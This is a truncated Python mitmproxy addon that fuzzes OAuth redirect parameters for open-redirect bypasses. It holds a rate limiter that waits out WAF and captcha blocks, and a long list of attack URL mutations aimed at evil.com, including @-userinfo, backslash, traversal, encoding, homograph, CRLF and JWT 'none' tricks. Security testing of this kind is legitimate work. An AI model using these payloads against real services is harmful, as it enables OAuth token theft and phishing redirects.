mirror of
https://github.com/j93es/oauth-backend.git
synced 2026-06-04 06:21:51 +09:00
1582 lines
64 KiB
Python
1582 lines
64 KiB
Python
from mitmproxy import http
|
||
import aiohttp
|
||
import asyncio
|
||
import random
|
||
import time
|
||
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
|
||
from lib.report_vuln import report_vuln
|
||
|
||
class RedirectRateLimiter:
|
||
"""OAuth Open Redirect 체크 전용 rate limiter"""
|
||
def __init__(self):
|
||
self.last_request = 0
|
||
self.request_count = 0
|
||
self.failure_count = 0
|
||
self.consecutive_failures = 0
|
||
self.blocked_until = 0
|
||
self.pattern_index = 0 # 현재 테스트 중인 패턴 번호
|
||
self.should_abandon_target = False
|
||
|
||
# 설정값 (전체 패턴 기준으로 최적화)
|
||
self.base_delay = 2.0 # 기본 2초 지연
|
||
self.failure_backoff = 0.5 # 실패시 0.5초씩 증가
|
||
self.max_delay = 5.0 # 최대 5초 지연
|
||
self.block_duration = 300 # 5분 차단
|
||
self.success_speedup = 0.8 # 성공시 속도 증가
|
||
|
||
def reset_for_new_target(self):
|
||
"""새로운 타겟을 위해 상태 리셋"""
|
||
self.last_request = 0
|
||
self.request_count = 0
|
||
self.failure_count = 0
|
||
self.consecutive_failures = 0
|
||
self.blocked_until = 0
|
||
self.pattern_index = 0
|
||
self.should_abandon_target = False
|
||
print("[RATE_LIMIT] 새로운 타겟을 위해 Rate Limiter 리셋됨")
|
||
|
||
async def wait_if_needed(self, pattern_name: str, target_url: str = "") -> bool:
|
||
"""속도 조절 및 차단 대기"""
|
||
current_time = time.time()
|
||
|
||
if self.should_abandon_target:
|
||
print(f"[TARGET_ABANDON] ⏹️ 타겟 포기됨 - 테스트 중단")
|
||
return False
|
||
|
||
# 차단 중인지 확인
|
||
if current_time < self.blocked_until:
|
||
remaining = int(self.blocked_until - current_time)
|
||
|
||
# 카운트다운 (10초 단위)
|
||
for i in range(remaining, 0, -1):
|
||
if i % 10 == 0 or i <= 10:
|
||
minutes = i // 60
|
||
seconds = i % 60
|
||
time_str = f"{minutes}분 {seconds}초" if minutes > 0 else f"{seconds}초"
|
||
print(f"\r⏳ 퍼징 재개까지: {time_str} 남음", end="", flush=True)
|
||
await asyncio.sleep(1)
|
||
|
||
print(f"\n✅ 대기 완료! {pattern_name} 패턴 퍼징 재개...")
|
||
self.blocked_until = 0
|
||
|
||
# 일반적인 퍼징 속도 조절
|
||
delay = self._calculate_delay()
|
||
time_since_last = current_time - self.last_request
|
||
|
||
if time_since_last < delay:
|
||
wait_time = delay - time_since_last
|
||
if wait_time > 2:
|
||
print(f"[FUZZER] ⏳ {wait_time:.1f}초 대기 (패턴: {pattern_name})")
|
||
await asyncio.sleep(wait_time)
|
||
|
||
self.last_request = time.time()
|
||
self.request_count += 1
|
||
self.pattern_index += 1
|
||
|
||
if self.pattern_index % 5 == 0:
|
||
print(f"[PROGRESS] 📊 {self.pattern_index}/71 패턴 테스트 완료 ({(self.pattern_index/71)*100:.1f}%)")
|
||
|
||
return True
|
||
|
||
def _calculate_delay(self) -> float:
|
||
"""적응형 지연 시간 계산"""
|
||
delay = self.base_delay
|
||
|
||
# 연속 실패에 따른 백오프
|
||
if self.consecutive_failures > 0:
|
||
backoff = min(self.consecutive_failures * self.failure_backoff, 3.0)
|
||
delay += backoff
|
||
|
||
# 전체 실패율에 따른 조정
|
||
if self.request_count > 5:
|
||
failure_rate = self.failure_count / self.request_count
|
||
if failure_rate > 0.3: # 실패율 30% 초과시
|
||
delay *= (1 + failure_rate)
|
||
|
||
# 최대값 제한
|
||
delay = min(delay, self.max_delay)
|
||
|
||
# 랜덤 지터 (±20%)
|
||
jitter = random.uniform(0.8, 1.2)
|
||
return delay * jitter
|
||
|
||
def record_success(self):
|
||
"""성공 기록"""
|
||
self.consecutive_failures = 0
|
||
# 성공시 약간 속도 증가 (학습 효과)
|
||
if self.base_delay > 0.5:
|
||
self.base_delay *= self.success_speedup
|
||
|
||
def record_failure(self, error_msg: str = ""):
|
||
"""실패 기록 및 차단 감지"""
|
||
self.failure_count += 1
|
||
self.consecutive_failures += 1
|
||
|
||
# 연속 5회 실패시 타겟 포기
|
||
if self.consecutive_failures >= 5:
|
||
self.should_abandon_target = True # ← 포기 플래그 설정
|
||
print(f"[TARGET_ABANDON] 🚫 연속 실패 {self.consecutive_failures}회 - 타겟 포기")
|
||
return
|
||
|
||
# 웹사이트 방어 메커니즘 감지 패턴들
|
||
rate_limit_patterns = [
|
||
'429', # Too Many Requests
|
||
'rate limit', 'rate-limit', 'ratelimit',
|
||
'too many requests', 'request limit',
|
||
'throttled', 'throttling'
|
||
]
|
||
|
||
# 웹방화벽/보안 솔루션 차단 패턴들
|
||
security_block_patterns = [
|
||
'cloudflare', 'security check',
|
||
'access denied', 'forbidden',
|
||
'blocked', 'banned', 'suspended',
|
||
'captcha', 'recaptcha',
|
||
'bot detected', 'suspicious activity'
|
||
]
|
||
|
||
error_lower = str(error_msg).lower()
|
||
|
||
if any(pattern in error_lower for pattern in rate_limit_patterns):
|
||
self.blocked_until = time.time() + self.block_duration
|
||
print(f"[RATE_LIMIT] 🚫 웹사이트 Rate Limit 감지 - {self.block_duration}초 대기 예정")
|
||
return
|
||
|
||
elif any(pattern in error_lower for pattern in security_block_patterns):
|
||
self.blocked_until = time.time() + self.block_duration
|
||
print(f"[SECURITY_BLOCK] 🛡️ 웹방화벽/보안 솔루션 차단 - {self.block_duration}초 대기 예정")
|
||
return
|
||
|
||
if self.consecutive_failures >= 5:
|
||
short_wait = 120
|
||
self.blocked_until = time.time() + short_wait
|
||
print(f"[FUZZER_PAUSE] ⏸️ 연속 실패 {self.consecutive_failures}회 - {short_wait}초 대기")
|
||
|
||
# 글로벌 레이트 리미터
|
||
redirect_limiter = RedirectRateLimiter()
|
||
|
||
class BypassPayload:
|
||
""" 우회 패턴 정의 """
|
||
def __init__(self, name: str, mutate_func, description: str):
|
||
self.name = name
|
||
self.mutate = mutate_func #우회 url 만드는 함수
|
||
self.description = description
|
||
|
||
class OpenRedirectChecker:
|
||
def __init__(self):
|
||
self.testing_targets = set() # 현재 테스트 중인 타겟들
|
||
self.tested_endpoints = set() # 이미 테스트 완료된 엔드포인트들
|
||
self.session = None
|
||
self._initialize_bypass_payloads() # bypass_payloads를 __init__에서 초기화
|
||
|
||
""" 우회 페이로드 목록 """
|
||
def _initialize_bypass_payloads(self):
|
||
self.bypass_payloads = [
|
||
BypassPayload(
|
||
name=r"@",
|
||
mutate_func=self._mutate_pattern1,
|
||
description=r"Host bypass attack using @ symbol: evil.com@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name="jwt_none_algorithm",
|
||
mutate_func=self._mutate_pattern47,
|
||
description="JWT state parameter 'none' algorithm bypass"
|
||
),
|
||
|
||
BypassPayload(
|
||
name="state_parameter_pollution",
|
||
mutate_func=self._mutate_pattern49,
|
||
description="Multiple state parameters pollution attack"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"backslash_bypass",
|
||
mutate_func=self._mutate_pattern9,
|
||
description=r"Backslash URL parsing bypass: target.com\\evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"double_slash",
|
||
mutate_func=self._mutate_pattern10,
|
||
description=r"Double slash bypass: target.com//evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"wildcard_subdomain_bypass",
|
||
mutate_func=self._mutate_pattern8,
|
||
description=r"Wildcard subdomain bypass: attacker.target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"question_mark",
|
||
mutate_func=self._mutate_pattern11,
|
||
description=r"Question mark bypass: target.com?evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"%ff@",
|
||
mutate_func=self._mutate_pattern2,
|
||
description=r"Hostname parsing bypass using Unicode %ff byte: evil%ff@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"%ff_subdomain",
|
||
mutate_func=self._mutate_pattern3,
|
||
description=r"Unicode %ff byte injection in subdomain: evil%ff.target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"fullwidth_slash_direct",
|
||
mutate_func=self._mutate_pattern4_1,
|
||
description=r"Direct fullwidth slash bypass: target.com/@evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"fullwidth_slash_encoded",
|
||
mutate_func=self._mutate_pattern4_2,
|
||
description=r"Encoded fullwidth slash bypass: target.com%EF%BC%8F@evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"fullwidth_backslash_direct",
|
||
mutate_func=self._mutate_pattern4_3,
|
||
description=r"Direct fullwidth backslash bypass: target.com\@evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"fullwidth_backslash_encoded",
|
||
mutate_func=self._mutate_pattern4_4,
|
||
description=r"Encoded fullwidth backslash bypass: target.com%EF%BC%BC@evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"mixed_backslash_types",
|
||
mutate_func=self._mutate_pattern5,
|
||
description=r"Mixed backslash types: target.com\\\evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"mixed_backslash_fullwidth_slash",
|
||
mutate_func=self._mutate_pattern6,
|
||
description=r"Mixed backslash and fullwidth slash: target.com\\/evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"path_traversal_basic",
|
||
mutate_func=self._mutate_pattern7_1,
|
||
description=r"Basic path traversal: target.com/path/../../../evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_deep",
|
||
mutate_func=self._mutate_pattern7_2,
|
||
description=r"Deep path traversal: target.com/path/../../../../../../../../evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_absolute",
|
||
mutate_func=self._mutate_pattern7_3,
|
||
description=r"Absolute path traversal: target.com/../evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_mixed",
|
||
mutate_func=self._mutate_pattern7_4,
|
||
description=r"Mixed slash traversal: target.com/path/.././.././evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_semicolon",
|
||
mutate_func=self._mutate_pattern7_5,
|
||
description=r"Semicolon path traversal: target.com/path/..;/..;/evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_encoded",
|
||
mutate_func=self._mutate_pattern7_6,
|
||
description=r"URL encoded traversal: target.com/path/%2e%2e/%2e%2e/evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_double_encoded",
|
||
mutate_func=self._mutate_pattern7_7,
|
||
description=r"Double encoded traversal: target.com/path/%252e%252e%252f/evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_hex",
|
||
mutate_func=self._mutate_pattern7_8,
|
||
description=r"Hex encoded traversal: target.com/path/%2e%2e%2f%2e%2e%2f/evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_unicode",
|
||
mutate_func=self._mutate_pattern7_9,
|
||
description=r"Unicode dot traversal: target.com/path/../../evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_backslash",
|
||
mutate_func=self._mutate_pattern7_10,
|
||
description=r"Backslash traversal: target.com/path\\..\\..\\evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_overlong",
|
||
mutate_func=self._mutate_pattern7_11,
|
||
description=r"Overlong UTF-8 traversal: target.com/path/%c0%ae%c0%ae/evil.com"
|
||
),
|
||
BypassPayload(
|
||
name=r"path_traversal_null",
|
||
mutate_func=self._mutate_pattern7_12,
|
||
description=r"Null byte traversal: target.com/path/../%00../evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"idn_homograph",
|
||
mutate_func=self._mutate_pattern12,
|
||
description=r"IDN homograph attack using visually similar characters: gооgle.com (Cyrillic)"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"ipv6_bypass",
|
||
mutate_func=self._mutate_pattern13,
|
||
description=r"IPv6 address bypass: evil.com@[::1] or evil.com@[2001:db8::1]"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"mixed_case_idn_combo",
|
||
mutate_func=self._mutate_pattern14,
|
||
description=r"Mixed case + IDN combo: ЕVIL.example@TARGET.COM"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"fragment_bypass",
|
||
mutate_func=self._mutate_pattern15,
|
||
description=r"Fragment identifier bypass: target.com#@evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"combined_bypass",
|
||
mutate_func=self._mutate_pattern16,
|
||
description=r"Combined multiple bypass techniques: evil.com@target.com//../../evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"path_backslash_domain",
|
||
mutate_func=self._mutate_pattern17,
|
||
description=r"Path backslash domain bypass: target.com\\.evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"mixed_encoding_chaos_basic",
|
||
mutate_func=self._mutate_pattern18_1,
|
||
description=r"Basic mixed encoding: evil.com%09%0A%20@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"mixed_encoding_chaos_full",
|
||
mutate_func=self._mutate_pattern18_2,
|
||
description=r"Full control char chaos: evil.com%0A%0D%09%0B%0C%20@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"mixed_encoding_chaos_special",
|
||
mutate_func=self._mutate_pattern18_3,
|
||
description=r"Control + special chars: evil.com%09%0A%20%00%FF@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"mixed_encoding_chaos_double",
|
||
mutate_func=self._mutate_pattern18_4,
|
||
description=r"Double encoded chaos: evil.com%2509%250A%2520@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"mixed_encoding_chaos_reverse",
|
||
mutate_func=self._mutate_pattern18_5,
|
||
description=r"Reverse control chars: evil.com%20%0A%09@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"mixed_encoding_chaos_repeat",
|
||
mutate_func=self._mutate_pattern18_6,
|
||
description=r"Repeated control chars: evil.com%09%09%09@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"subdomain_confusion_hyphen",
|
||
mutate_func=self._mutate_pattern19,
|
||
description=r"Subdomain confusion with hyphen: target-com.evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"semicolon_userinfo_bypass",
|
||
mutate_func=self._mutate_pattern20,
|
||
description=r"Semicolon userinfo bypass: target.com;evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"tab_character_bypass",
|
||
mutate_func=self._mutate_pattern21,
|
||
description=r"Tab character bypass using %09: evil.com%09@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"space_character_bypass",
|
||
mutate_func=self._mutate_pattern22,
|
||
description=r"Space character bypass using %20: evil.com%20@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"form_feed_bypass",
|
||
mutate_func=self._mutate_pattern23,
|
||
description=r"Form feed character bypass using %0c: evil.com%0c@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"vertical_tab_bypass",
|
||
mutate_func=self._mutate_pattern24,
|
||
description=r"Vertical tab bypass using %0b: evil.com%0b@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"%0a@",
|
||
mutate_func=self._mutate_pattern25,
|
||
description=r"Newline character bypass using %0a@: evil.com%0a@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"%0d@",
|
||
mutate_func=self._mutate_pattern26,
|
||
description=r"Carriage return bypass using %0d@: evil.com%0d@target.com (URL parser confusion)"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"crlf_injection",
|
||
mutate_func=self._mutate_pattern27,
|
||
description=r"CRLF injection bypass: evil.com%0D%0A@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"mixed_case_scheme",
|
||
mutate_func=self._mutate_pattern28,
|
||
description=r"Mixed case scheme bypass: HtTpS://evil.com@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"scheme_dot_injection",
|
||
mutate_func=self._mutate_pattern29,
|
||
description=r"Scheme dot injection: https.://evil.com@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"port_encoded_bypass",
|
||
mutate_func=self._mutate_pattern30,
|
||
description=r"Port encoded bypass: target.com:%40evil.com (%40 = @)"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"ampersand_encoded_bypass",
|
||
mutate_func=self._mutate_pattern31,
|
||
description=r"Ampersand encoded bypass: target.com &%40evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"underscore_encoded_bypass",
|
||
mutate_func=self._mutate_pattern32,
|
||
description=r"Underscore encoded bypass: target.com.%5F.evil.com (%5F = _)"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"comma_separator_bypass",
|
||
mutate_func=self._mutate_pattern33,
|
||
description=r"Comma separator bypass: target.com.%2C.evil.com (%2C = ,)"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"schemeless_bypass",
|
||
mutate_func=self._mutate_pattern34,
|
||
description=r"Schemeless bypass: //evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"schema_colon_bypass",
|
||
mutate_func=self._mutate_pattern35,
|
||
description=r"Schema colon bypass: http:evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"null_byte_prefix",
|
||
mutate_func=self._mutate_pattern36,
|
||
description=r"Null byte prefix: %00http://evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"unicode_spaces_bypass",
|
||
mutate_func=self._mutate_pattern37,
|
||
description=r"Unicode spaces bypass: evil.com%E2%80%8Btarget.com (zero-width space)"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"bracket_encoded_bypass",
|
||
mutate_func=self._mutate_pattern38,
|
||
description=r"Bracket encoded bypass: target.com%5B%40evil.com (%5B = [)"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"protocol_omit_backslash",
|
||
mutate_func=self._mutate_pattern39,
|
||
description=r"Protocol omit with backslash: \\\\evil.com\\target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"query_internal_bypass",
|
||
mutate_func=self._mutate_pattern40,
|
||
description=r"Internal query bypass: target.com?url=target.com&redirect=evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"anchor_at_combo",
|
||
mutate_func=self._mutate_pattern41,
|
||
description=r"Anchor + @ combo: target.com#evil.com@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"emoji_domain_bypass",
|
||
mutate_func=self._mutate_pattern42,
|
||
description=r"Emoji domain bypass: https://😈.evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"punycode_idn_bypass",
|
||
mutate_func=self._mutate_pattern43,
|
||
description=r"Punycode IDN bypass: https://xn--e1afmkfd.xn--p1ai"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"backtick_at_combo",
|
||
mutate_func=self._mutate_pattern44,
|
||
description=r"Backtick @ combo: evil.com`@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"complex_encoding_mix",
|
||
mutate_func=self._mutate_pattern45,
|
||
description=r"Complex encoding mix: evil%2Ecom%09%0A%FF@target.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name=r"question_backslash_combo",
|
||
mutate_func=self._mutate_pattern46,
|
||
description=r"Question backslash combo: target.com?\\evil.com"
|
||
),
|
||
|
||
BypassPayload(
|
||
name="jwt_empty_signature",
|
||
mutate_func=self._mutate_pattern48,
|
||
description="JWT state parameter empty signature bypass"
|
||
),
|
||
|
||
BypassPayload(
|
||
name="state_case_insensitive",
|
||
mutate_func=self._mutate_pattern50,
|
||
description="State parameter case insensitive bypass: State, STATE, state"
|
||
),
|
||
|
||
BypassPayload(
|
||
name="jwt_header_manipulation",
|
||
mutate_func=self._mutate_pattern51,
|
||
description="JWT header manipulation bypass (typ, alg changes)"
|
||
),
|
||
|
||
BypassPayload(
|
||
name="jwt_payload_pollution",
|
||
mutate_func=self._mutate_pattern52,
|
||
description="JWT payload pollution with malicious claims"
|
||
),
|
||
]
|
||
|
||
""" 우회 URL 생성 목록 """
|
||
# 1. @
|
||
def _mutate_pattern1(self, original: str) -> str:
|
||
return f"https://evil.com@{original}"
|
||
|
||
# 2. %ff@ - 유니코드 바이트 우회
|
||
def _mutate_pattern2(self, original: str) -> str:
|
||
return f"https://evil%ff@{original}"
|
||
|
||
# 3. %ff 서브도메인 - 유니코드 바이트 서브도메인 삽입
|
||
def _mutate_pattern3(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
path_part = parsed.path if parsed.path else ""
|
||
return f"https://evil%ff.{parsed.netloc}{path_part}"
|
||
|
||
# 4. 전각 문자 패턴 - /, %EF%BC%8F, \, %EF%BC%BC
|
||
# 4_1. 직접 전각 슬래시
|
||
def _mutate_pattern4_1(self, original: str) -> str:
|
||
return f"https://{original}/@evil.com"
|
||
|
||
# 4_2. URL 인코딩된 전각 슬래시(%EF%BC%8F)
|
||
def _mutate_pattern4_2(self, original: str) -> str:
|
||
return f"https://{original}%EF%BC%8F@evil.com"
|
||
|
||
# 4_3. 직접 전각 백슬래시
|
||
def _mutate_pattern4_3(self, original: str) -> str:
|
||
return f"https://{original}\@evil.com"
|
||
|
||
# 4_4. URL 인코딩된 전각 백슬래시(%EF%BC%BC)
|
||
def _mutate_pattern4_4(self, original: str) -> str:
|
||
return f"https://{original}%EF%BC%BC@evil.com"
|
||
|
||
# 5. 백슬래시 + 전각 백슬래시 조합
|
||
def _mutate_pattern5(self, original: str) -> str:
|
||
return f"https://{original}\\\evil.com"
|
||
|
||
# 6. 백슬래시 + 전각 슬래시
|
||
def _mutate_pattern6(self, original: str) -> str:
|
||
return f"https://{original}\\/evil.com"
|
||
|
||
# 7. 경로 순회 - Path traversal bypass
|
||
# 7-1. 기본 경로 순회
|
||
def _mutate_pattern7_1(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
return f"https://{parsed.netloc}{base_path}/../../../evil.com"
|
||
|
||
# 7-2. 더 많은 경로 순회
|
||
def _mutate_pattern7_2(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
return f"https://{parsed.netloc}{base_path}/../../../../../../../../evil.com"
|
||
|
||
# 7-3. 절대 경로로 우회
|
||
def _mutate_pattern7_3(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
return f"https://{parsed.netloc}/../evil.com"
|
||
|
||
# 7-4. 혼합 슬래시 패턴
|
||
def _mutate_pattern7_4(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
return f"https://{parsed.netloc}{base_path}/.././.././evil.com"
|
||
|
||
# 7-5. 점 뒤에 추가 문자
|
||
def _mutate_pattern7_5(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
return f"https://{parsed.netloc}{base_path}/..;/..;/evil.com"
|
||
|
||
# 7-6. URL 인코딩된 경로 순회
|
||
def _mutate_pattern7_6(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
# %2e = ., %2f = /
|
||
return f"https://{parsed.netloc}{base_path}/%2e%2e/%2e%2e/%2e%2e/evil.com"
|
||
|
||
# 7-7. 이중 URL 인코딩
|
||
def _mutate_pattern7_7(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
# %252e = 이중 인코딩된 .
|
||
return f"https://{parsed.netloc}{base_path}/%252e%252e%252f%252e%252e%252fevil.com"
|
||
|
||
# 7-8. 16진수 인코딩
|
||
def _mutate_pattern7_8(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
# 0x2e2e2f = ../
|
||
return f"https://{parsed.netloc}{base_path}/%2e%2e%2f%2e%2e%2f%2e%2e%2fevil.com"
|
||
|
||
# 7-9. 유니코드 정규화 우회
|
||
def _mutate_pattern7_9(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
# 유니코드 점 문자들 (U+002E, U+FF0E 등)
|
||
return f"https://{parsed.netloc}{base_path}/../../evil.com"
|
||
|
||
# 7-10. 백슬래시 + 경로 순회 조합
|
||
def _mutate_pattern7_10(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
return f"https://{parsed.netloc}{base_path}\\..\\..\\evil.com"
|
||
|
||
# 7-11. 오버롱 UTF-8 인코딩
|
||
def _mutate_pattern7_11(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
# %c0%ae = 오버롱 UTF-8로 인코딩된 점
|
||
return f"https://{parsed.netloc}{base_path}/%c0%ae%c0%ae/%c0%ae%c0%ae/evil.com"
|
||
|
||
# 7-12. 널 바이트 삽입
|
||
def _mutate_pattern7_12(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
base_path = parsed.path if parsed.path else "/callback"
|
||
# %00 = 널 바이트
|
||
return f"https://{parsed.netloc}{base_path}/../%00../../../evil.com"
|
||
|
||
# 8. 와일드카드 서브도메인 우회
|
||
def _mutate_pattern8(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
path_part = parsed.path if parsed.path else ""
|
||
# 공격자가 제어하는 서브도메인으로 *.target.com 정책 우회
|
||
return f"https://attacker.{parsed.netloc}{path_part}"
|
||
|
||
# 9. 백슬래시 우회 - Dart SDK Issue #50075
|
||
def _mutate_pattern9(self, original: str) -> str:
|
||
return f"https://{original}\\evil.com"
|
||
|
||
# 10. 이중 슬래시
|
||
def _mutate_pattern10(self, original: str) -> str:
|
||
return f"https://{original}//evil.com"
|
||
|
||
# 11. 물음표 우회
|
||
def _mutate_pattern11(self, original: str) -> str:
|
||
return f"https://{original}?evil.com"
|
||
|
||
# 12. IDN 동형문자 공격 - 시각적으로 동일하지만 다른 도메인
|
||
def _mutate_pattern12(self, original: str) -> str:
|
||
# RFC 2606 테스트 도메인 + IDN 문자 о(키릴 문자 U+043E) vs o(라틴 문자 U+006F) 사용
|
||
return f"https://еvil.example@{original}"
|
||
|
||
# 13. IPv6 주소 우회 - 안전한 버전
|
||
def _mutate_pattern13(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
path_part = parsed.path if parsed.path else ""
|
||
|
||
# 안전한 IPv6 @ 우회 패턴
|
||
if "localhost" in parsed.netloc:
|
||
mutated = f"https://evil.example@[::1]:3000{path_part}"
|
||
else:
|
||
# RFC 3849 문서용 IPv6 주소 사용 (라우팅 안 됨)
|
||
mutated = f"https://evil.example@[2001:db8::1]{path_part}"
|
||
|
||
return mutated
|
||
|
||
# 14. 대소문자 + IDN 문자 조합으로 필터 우회
|
||
def _mutate_pattern14(self, original: str) -> str:
|
||
return f"https://ЕVIL.example@{original}" # Е는 키릴 문자
|
||
|
||
# 15. Fragment identifier 우회
|
||
def _mutate_pattern15(self, original: str) -> str:
|
||
# Fragment(#)로 실제 목적지 숨기기 - 브라우저는 fragment 부분을 서버에 전송하지 않음
|
||
return f"https://{original}#@evil.com"
|
||
|
||
# 16. 복합 우회 패턴 - 여러 기법 동시 적용
|
||
def _mutate_pattern16(self, original: str) -> str:
|
||
# @ 우회 + 이중 슬래시 + 경로 순회 조합
|
||
return f"https://evil.com@{original}//../../evil.com"
|
||
|
||
# 17. 경로에 백슬래시 + 도메인 우회 (Chrome, Firefox, Edge)
|
||
def _mutate_pattern17(self, original: str) -> str:
|
||
# target.com\\.evil.com 패턴 - 기존 백슬래시 패턴과는 다른 위치
|
||
return f"https://{original}\\.evil.com"
|
||
|
||
# 18_1. 혼합 인코딩 우회 (여러 인코딩 방식 조합)
|
||
def _mutate_pattern18_1(self, original: str) -> str:
|
||
# 탭 + 줄바꿈 + 공백
|
||
return f"https://evil.com%09%0A%20@{original}"
|
||
|
||
# 18_2. 모든 제어 문자 조합
|
||
def _mutate_pattern18_2(self, original: str) -> str:
|
||
# 줄바꿈 + 캐리지리턴 + 탭 + 수직탭 + 폼피드 + 공백
|
||
return f"https://evil.com%0A%0D%09%0B%0C%20@{original}"
|
||
|
||
# 18_3. 제어 문자 + 특수 문자
|
||
def _mutate_pattern18_3(self, original: str) -> str:
|
||
return f"https://evil.com%09%0A%20%00%FF@{original}"
|
||
|
||
# 18_4. 이중 인코딩 + 제어 문자
|
||
def _mutate_pattern18_4(self, original: str) -> str:
|
||
return f"https://evil.com%2509%250A%2520@{original}"
|
||
|
||
# 18_5. 역순 제어 문자
|
||
def _mutate_pattern18_5(self, original: str) -> str:
|
||
return f"https://evil.com%20%0A%09@{original}"
|
||
|
||
# 18_6. 반복 제어 문자
|
||
def _mutate_pattern18_6(self, original: str) -> str:
|
||
return f"https://evil.com%09%09%09@{original}"
|
||
|
||
# 19. 서브도메인 혼동 우회 (하이픈 버전)
|
||
def _mutate_pattern19(self, original: str) -> str:
|
||
parsed = urlparse(original)
|
||
path_part = parsed.path if parsed.path else ""
|
||
# target.com → target-com.evil.com
|
||
host_with_hyphen = parsed.netloc.replace('.', '-').replace(':', '-')
|
||
return f"https://{host_with_hyphen}.evil.com{path_part}"
|
||
|
||
# 20. 세미콜론 userinfo 우회
|
||
def _mutate_pattern20(self, original: str) -> str:
|
||
return f"https://{original};evil.com"
|
||
|
||
# 21. %09 - 탭 문자 우회
|
||
def _mutate_pattern21(self, original: str) -> str:
|
||
return f"https://evil.com%09@{original}"
|
||
|
||
# 22. %20 - 공백 문자 우회
|
||
